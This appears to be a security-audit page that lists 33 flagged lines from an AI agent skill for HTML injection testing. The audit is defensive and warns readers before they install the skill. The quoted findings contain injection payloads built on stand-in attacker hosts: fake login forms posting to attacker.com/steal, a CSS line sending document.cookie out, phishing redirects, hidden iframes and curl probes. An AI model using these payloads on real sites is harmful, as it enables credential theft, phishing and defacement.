html-injection-testing
Identifies and exploits HTML injection vulnerabilities in web applications, providing reports and remediation guidance.
Security score
The html-injection-testing skill was audited on Mar 5, 2026 and we found 33 security issues across 3 threat categories. Review the findings below before installing.
Categories Tested
Security Issues
Curl to non-GitHub URL
| 128 | curl "http://target.com/search?q=<h1>Test</h1>" |
Curl to non-GitHub URL
| 131 | curl -s "http://target.com/search?q=<b>Bold</b>" | grep -i "bold" |
Curl to non-GitHub URL
| 134 | curl "http://target.com/search?q=%3Ch1%3ETest%3C%2Fh1%3E" |
Unicode escape sequences
| 332 | \u003ch1\u003eUnicode\u003c/h1\u003e |
Unicode escape sequences
| 470 | | Unicode | `\u003c` = `<` | |
External URL reference
| 117 | <a href="http://attacker.com">Click Here</a> |
External URL reference
| 118 | <a href="http://attacker.com">Legitimate Link</a> |
External URL reference
| 121 | <img src="http://attacker.com/image.png"> |
External URL reference
| 128 | curl "http://target.com/search?q=<h1>Test</h1>" |
External URL reference
| 131 | curl -s "http://target.com/search?q=<b>Bold</b>" | grep -i "bold" |
External URL reference
| 134 | curl "http://target.com/search?q=%3Ch1%3ETest%3C%2Fh1%3E" |
External URL reference
| 148 | <p>Please login at <a href="http://attacker.com/login">portal.company.com</a></p> |
External URL reference
| 153 | <form action="http://attacker.com/steal" method="POST"> |
External URL reference
| 166 | http://target.com/welcome?name=<h1>Welcome%20Admin</h1><form%20action="http://attacker.com/steal"> |
External URL reference
| 169 | http://target.com/search?q=<marquee>Your%20account%20has%20been%20compromised</marquee> |
External URL reference
| 179 | http://target.com/submit |
External URL reference
| 183 | http://target.com/register |
External URL reference
| 192 | http://target.com/page/<h1>Injected</h1> |
External URL reference
| 195 | http://target.com/users/<img src=x>/profile |
External URL reference
| 208 | <form action="http://attacker.com/capture" method="POST"> |
External URL reference
| 219 | input { background: url('http://attacker.com/log?data=') } |
External URL reference
| 221 | <form action="http://attacker.com/steal" method="POST"> |
External URL reference
| 230 | http://target.com/page?msg=%3Cdiv%20style%3D%22position%3Afixed%3Btop%3A0%3Bleft%3A0%3Bwidth%3A100%25%3Bheight%3A100%25%3Bbackground%3Awhite%3Bz-index%3A9999%3Bpadding%3A50px%3B%22%3E%3Ch2%3ESession%2 |
External URL reference
| 252 | <img src="http://attacker.com/defaced.jpg" |
External URL reference
| 268 | body { background: url('http://attacker.com/track?cookie='+document.cookie) } |
External URL reference
| 274 | <div style="background:url('http://attacker.com/log')">Content</div> |
External URL reference
| 281 | <meta http-equiv="refresh" content="0;url=http://attacker.com/phish"> |
External URL reference
| 291 | <form action="http://attacker.com/steal"> |
External URL reference
| 302 | <iframe src="http://attacker.com/malicious" width="100%" height="500"></iframe> |
External URL reference
| 305 | <iframe src="http://attacker.com/track" style="display:none"></iframe> |
External URL reference
| 369 | target = "http://target.com/search" |
External URL reference
| 377 | "<a href='http://evil.com'>Click</a>", |
External URL reference
| 380 | "<iframe src='http://evil.com'></iframe>", |